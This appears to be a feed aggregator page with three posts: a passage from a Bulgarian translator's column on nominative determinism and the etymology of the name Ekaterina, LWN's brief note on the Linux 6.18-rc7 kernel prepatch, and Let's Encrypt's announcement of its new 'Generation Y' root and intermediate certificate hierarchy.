В романа „Пътуване по посока на сянката“ Яна Букова например дава на героите си изпълнени със значения (и трудни за превод) имена: „… дядо ѝ, който носеше името, което дават на късметлиите сираци – Найден, но никой не го знаеше откъде е дошъл, кой го беше загубил, кой го беше намерил“; Неделя – „жена с име на празник и съзвездия върху кожата си“; или пък полиглота Утис, чието име – заето от Одисей и означаващо „Никой“ на старогръцки – може да се чете (и) като вид намигване към пословичната невидимост на преводача.

Нещата се усложняват допълнително, когато името на литературния герой подсказва свързаност със самия автор, но преводът по една или друга причина я прикрива или направо изтрива. Ето как, докато българският читател би могъл да направи връзка между холандския пътешественик и разказвач в „Пътуване по посока на сянката“ Ян ван Атен и авторката Яна Букова, която (частично) живее в Атина, конвенционалното изписване на „холандското“ наименование на латиница (Jan van Atten), английското название на гръцката столица (Athens) и фактът, че авторката транслитерира името си като Iana, унищожават възможността тази връзка да бъде разкрита от англоезичните читатели.

Докато в художествените текстове тези взаимовръзки между героите и техните (и на авторите им¹) имена са просто литературен похват, истинският живот понякога ни среща със съвсем реални персонажи, чиито характери, професии или съдби са толкова очевидно отразени в имената им, че от тях би се получила доста слаба литература. В световен план имаме американския пилот от Формула 1 Скот Спийд, чиято фамилия означава „скорост“, и ямайския спринтьор Юсейн Болт, чието второ име означава „мълния“. В български контекст се сещам за известната в миналото режисьорка на дублажа Трендафилка Немска, както и за Пламен Горанов – активиста, който през 2013 г. се замозапали, пламна и изгоря в знак на протест срещу управлението на град Варна.

Търсенето и откриването на такъв вид връзки както в литературата, така и в живота отдавна ми е особено любопитно, но едва наскоро научих, че този „феномен“ – или по-точно

идеята, че името на човека влияе върху неговия характер, избора на професия или цялостната му посока в живота – си има наименование: през 90-те години на миналия век се появява понятието „номинативен детерминизъм“.

В английския език съществува и терминът aptonym – от apt (‘подходящо’) + onym (‘име’), добил популярност през втората половина на XX век. Понякога се среща и в по-ранния си вариант от 20-те години – aptronym, за който се смята, че първоначално е формиран по модела на „патроним“. С течение на времето тези думи са изместили датиращото от края на XIX век и вече смятано за остаряло понятие euonym, чийто префикс произлиза от старогръцката дума εὖ ‘добър, истински’².

Термините може да са сравнително нови, но идеята за връзката между човека и неговото име както в литературата, така и в истинския живот съществува още от древността. Платон например твърди, че тъй като собствените имена отразяват природата и същността на даден човек, няма как те да са произволни. Римските автори също поддържат тезата nomen est omen – тоест че името е знак, поличба или предзнаменование. Много от героите на Хораций – например поглъщащият цели „торти“ наведнъж Porcius³ – свидетелстват за това.

Вярването в определящата роля на името за характера и съдбата на неговия носител навлиза и в Средновековието, когато наименованията на светци и добродетели стават особено популярни, а през Ренесанса даже се засилва благодарение на религиозни, социални и езотерични фактори, като възраждането на интереса към херметизма, кабалата, алхимията, астрологията и нумерологията.

Всъщност, като се замисля, номинативният детерминизъм не е кой знае колко по-различен от вярването в значението на зодиите, само дето там опциите са ограничени до дванайсет, докато при имената възможностите на практика са безкрайни.

Така или иначе, в чест на Деня на света Екатерина, който Православната църква отбелязва на 24 ноември, а Католическата (и някои протестантски) – на 25-ти (а защо не и в чест на все така актуалната кампания #namethetranslator, призоваваща преводачът да бъде назован), решавам да науча малко повече за произхода, историята и етимологията на моето собствено име.

И така: за the OG Екатерина, или

първата носителка на името, се смята света великомъченица Екатерина, известна още и като Екатерина Александрийска.

За нея се твърди, че е живяла около 18 години в края на III и началото на IV век. Колкото и да е примамливо (агиографията на светицата я представя като „изключителна интелектуалка и голяма красавица“), ще устоя на изкушението да търся паралели между нейното житие и моя живот не само защото ни делят повече от седемнайсет века, но и заради липсата на исторически доказателства за нейното съществуване.(И въпреки това образът ѝ на жена, спореща с езически философи, особено ми импонира, а твърдението, било то и непотвърдено, че е знаела „72-та езика на света“ поражда у мен възхищение, вдъхновение и съвсем нехристиянска завист.)

Дори и при липсата на сходства и исторически доказателства обаче не е особено трудно човек, дори и да не споделя нейното име, да се почувства свързан със (a и защитен от) света Екатерина благодарение на впечатляващо дългия, почти поетичен списък с професии, занимания и семейни положения, които тя покровителства: апологети; архивисти; адвокати и юристи; библиотекари; шапкари, галантеристи, модисти и журналисти; философи и теолози; девойки, неомъжени жени и „стари моми“6; учени, ученици и учители; писари, преписвачи и стенографи; грънчари, предачи, каруцари и други занаятчии, работещи с колела; кожари и точилари. Свети Йероним може само да завижда. А аз лично, поне към този момент, се разпознавам поне в пет от изброените категории.

Предполагаемите етимологии на самото име също са доста разностранни. Според най-популярната теория първоизточникът на името Екатерина е старогръцкото име Αἰκατερίνη (Aikaterínē), за което се смята, че произлиза от прилагателното καθαρά (kathará, ‘чиста, бистра, неопетнена’)7. Според експертите обаче това обяснение е по-скоро фолклорна етимология, която е възникнала впоследствие, през римската и ранната християнска епоха, като обяснение на вече съществуващото име. Теорията също така се прилага като обяснение за аферезата, или отпадането на първата сричка8, както и за промяната в изписването на името на латиница – от Katerina на Katharina.

Според втората теория, смятана за по-надеждна, името произлиза от друга старогръцка дума, а именно местоимението ἑκᾰτέρᾱ (hekătérā) което означава както „всяка от двете“, така и „една от двете“. Няма как да не отбележим, че случайно или не тези значения обобщават същността на преводаческата дейност идеално – както буквално, така и метафорично.

Коренът на гореспоменатото местоимение пък е наречието ἑκάς (hekás), което означава „далеч“, „от разстояние“ или „дълго след това“ и също доста добре подхожда не само на преводаческите ми занимания, но и на пътешественическите ми страсти. (Думата е в корена и на едно от слабо известните прозвища на Аполон – Ἑκατός (Hekatós) заради способността му да влияе отдалеч.)

Вероятно е името Екатерина, особено ранното му изписване като Ἑκατερίνη (Ekaterínē), да е етимологично свързано и с друго древногръцко божество – богинята Ἑκάτη (Hekátē), или както е известна на български, Хеката. Нейната сфера на влияние е значително по-тясна (и тъмна!) от тази на светицата – освен богиня на магията, вещерството, нощта, луната, духовете и отвъдното, Хеката се смята и за пазителка на кръстопътища, прагове, портали и всякакви други гранични пространства. Изобразена като разтроена фигура с три глави, гледащи в три различни посоки (към миналото, сегашното и бъдещето), тя ми се струва съвсем достойна за богиня на превода, въпреки че позицията вече е заета от (внука на Атлас) Хермес, от чието име произлиза и терминът „херменевтика“.

Колкото и да са ми забавни тези съвпадения, далеч (тоест ἑκᾰ́ς) съм от мисълта, че името ми предопределя живота или пък е предопределено от него. И макар че моят (пълен, както и кратък9) nomen не е недвусмислен omen, аз все пак харесвам името си и се идентифицирам с него. Сложният му, не съвсем ясен произход, отварящ различни възможности за интерпретация, ми предоставя известна свобода – да бъда чиста като светица, могъща като древногръцка богиня, влияеща отдалеч като магьосница, злокобна като вещица, вечно стояща на кръстопът като преводачка… една от двете или пък и двете, трите, четирите, петте. Това нямаше да е възможно, ако носех по-категорично име, например победоносните Николета, Лора, Дафина, Сигрид, Вероника или Виктория, което да предполага някаква еднопосочна, постоянна и недвусмислено славна съдба. Но в края на краищата нали за тази цел си имам зодия.

1 Имената на самите автори също понякога носят определен заряд. С това фамилно име, макар да го изписва Boukova (а не Bookova или Buchova), Яна Букова изглежда предопределена да пише книги.

2 Докато съществителното euоnym означава буквално „добро, истинско име“, древногръцкото прилагателно εὐώνῠμος (euṓnŭmos), формирано от същите корени, освен като описание на някой или нещо, носещ добро, правилно или благоприятно име, се използва в астрономията и означава „южен“, както и като евфемизъм за нещо, което се намира от лявата страна и/или предвещава нещастие. (Сходна е етимологията на английската дума sinister, която има подобно значение – „злокобен“, и произлиза от латинската дума за „ляво“.)

3 В оригиналния стих за свинския Porcius на латински прави впечатление, че „тортите“, които той поглъща цели наведнъж, се наричат placentas. Както вече съм писалa, не е изключено точно сладкишът с това наименование от древността да е предшественик на баклавата.

4 Екатерина Александрийска се смята за първата носителка на името, но след нея се появяват още няколко (предполагаемо кръстени на нея) (Е)Катерини, които са канонизирани като светици от Католическата църква. Сред тях са италианската богословка, мистичка и дипломатка от XIV век Катерина Сиенска, чийто празник се отбелязва на 29 април; светицата и мистичка Катерина Генуезка, живяла през XV–XVI век и посветила се на болните и бедните, чийто празник е на 15 септември; светицата покровителка на художниците и пазителка срещу изкушенията Катерина Болонезка от XV век, чийто празник е 9 март; и французойката Катрин Лабуре, милосърдна монахиня от XVIII век и създателка на медала за религиозна отдаденост Numisma Immaculatae Conceptionis, канонизирана в средата на XX век, чийто празник е на 28 ноември.

5 Поради липсата на исторически доказателства за нейното съществуване света Екатерина е премахната от католическия календар през 1969 г., но през 2000 г. като жест към православните християни папа Йоан Павел II я възстановява. Някои историци смятат, че легендата на света Екатерина, която се споменава като християнска мъченица за първи път едва през VIII век, всъщност се основавa на реалния живот на видната късноантична философка, математичка и астрономка Хипатия Александрийска (ок. 355–415), смятана за една от първите жени учени в историята. Забележително е, че ролите на християните и езичниците в двете истории са разменени.

6 В някои региони на Франция неомъжените жени над 25 години се наричат catherinettes, или „(e)катеринки“. Те отбелязват Деня на света Катерина на 25 ноември, като носят екстравагантни шапки в жълто и зелено и се молят на светицата да им намери и изпрати съпруг.

7 Ако тази теория се приеме за вярна, това би означавало, че името споделя общ корен с думата „катарзис“, както и с наименованието на катарството и неговите последователи – катарите.

8 Като носителка на възможно най-разширения вариант на името ми е любопитно защо в много езици първата сричка липсва, докато в някои все още е запазена – освен в България пълният вариант, започващ с Е, се среща и в други източноправославни традиции, например руската, гръцката и грузинската (там името ეკატერინე изглежда колкото неустоимо красиво, толкова и неразчетимо). Според специалистите по историческа лингвистика, докато сред западните славяни името навлиза от латински по католическа линия, сред източните и южните славяни то навлиза от византийския гръцки, поради което запазва началната си гласна.

9 Едно от преимуществата човек да има толкова дълго име, било то и с неустановена етимология, е наличието на множество, често забавни прякори и умалителни форми, които може да генерира. Краткото име, което аз лично използвам най-често, е Катето – това винаги кара българите, с които се запознавам, да се засмеят, докато англичаните го произнасят като potato и недоумяват как производно от женско име може да е хем в среден род, хем да се членува. Когато бях малка, тъкмо бях прочела „Митко Палаузов“, когато с гордост открих, че иначе омразното ми (и досега) Катя, изписано наобратно, се превръща в думата „ятак“. Години по-късно пък моите състуденти в Щатите ми измислиха шеговитото прозвище на любител на животните Kitty Petlover. А впоследствие, докато живеех във Франция, приятелите ми ме наричаха Ékat – прякор, съставен по модела на жаргонната практика verlan (от l’envers ‘наопаки, наобратно’), при която сричките на думата се разменят, така че femme става meuf (‘жена’) , а fête става teuf (‘купон’). Непознатите французи пък често решаваха, че се представям като Et Katerina, поставяйки съюза „и“ пред името си, все едно съм нечие продължение. Това само по себе си е чудесно съвпадение за един преводач, чието име неизменно се появява в комплект с името на автора.

В рубриката „От дума на дума“ Екатерина Петрова търси актуални, интересни или новопоявили се думи от нашето ежедневие и проследява често изненадващия им произход, развитието на значенията им във времето и взаимовръзките им с близки и далечни езици.

Kernel prepatch 6.18-rc7

Post Syndicated from corbet original https://lwn.net/Articles/1047578/

Linus has released 6.18-rc7, probably the
last -rc before the 6.18 release.

So the rc6 kernel wasn’t great: we had a last-minute core VM
regression that caused people problems.

That’s not a great thing late in the release cycle like that, but
it was a fairly trivial fix, and the cause wasn’t some horrid bug,
just a latent gotcha that happened to then bite a late VM fix. So
while not great, it also doesn’t make me worry about the state of
6.18. We’re still on track for a final release next weekend unless
some big new problem rears its ugly head.

New “Generation Y” Hierarchy of Root and Intermediate Certificates

Post Syndicated from Let's Encrypt original https://letsencrypt.org/2025/11/24/gen-y-hierarchy.html

In a ceremony held in September, Let’s Encrypt generated two new Root Certification Authorities (CAs) and six new Intermediate CAs, which we’re collectively calling the “Generation Y” hierarchy. Now we’re moving to begin issuing certificates from this new hierarchy, and to submit it to various root programs for inclusion in their trust stores.

Diagram of the new Generation Y Root and Intermediate CAs

The two new roots look very similar to our existing roots. The new ISRG Root YR has an RSA 4096 key and is valid for twenty years, just like ISRG Root X1. Similarly, the new ISRG Root YE has an ECDSA P-384 key, just like ISRG Root X2. We’ve made a few adjustments (for example, replacing “Internet Security Research Group” with “ISRG” to save a few bytes), but nothing major. Each of these new roots is intended to eventually replace its corresponding predecessor, and to that end we have cross-signed the new roots from the old ones.

The six new intermediates consist of three intermediates each issued from each of the two new roots. ISRG Root YE has issued the YE1, YE2, and YE3 intermediates, while ISRG Root YR has issued the YR1, YR2, and YR3 intermediates. These have two key differences from our current crop of issuing intermediates. First, their names: we’re now numbering intermediates under each root sequentially, rather than using the same numbering sequence across all intermediates. This makes it slightly easier to keep track of which intermediates are currently in use, and prepares for a possible post-quantum future where we have additional key types.

Second and more importantly: these intermediates do not contain the “TLS Web Client Authentication” Extended Key Usage. This means that these intermediates cannot issue end-entity certificates containing that EKU. As we’ve already announced, we will be phasing out issuance of tlsClientAuth certificates in 2026 due to a root program requirement. Until that time, we will only be using the new hierarchy to issue certificates under the “tlsserver” and “shortlived” profiles, which already omit that EKU. After the tlsClientAuth deprecation is complete, we will shift to using the new intermediates for all issuance.

If you’re requesting the tlsserver or shortlived profile, you can expect to see issuance from (the Staging equivalent of) the new hierarchy as of today. We expect to make the same change in our Production environment next month. As before, each issuance will choose which intermediate to use at random, to discourage intermediate key pinning.

We’ll be submitting the new roots for inclusion in the Apple, Chrome, Microsoft, Mozilla, and other root programs shortly thereafter. We look forward to updating you again when the new hierarchy is officially included in those trust stores!

The collective thoughts of the interwebz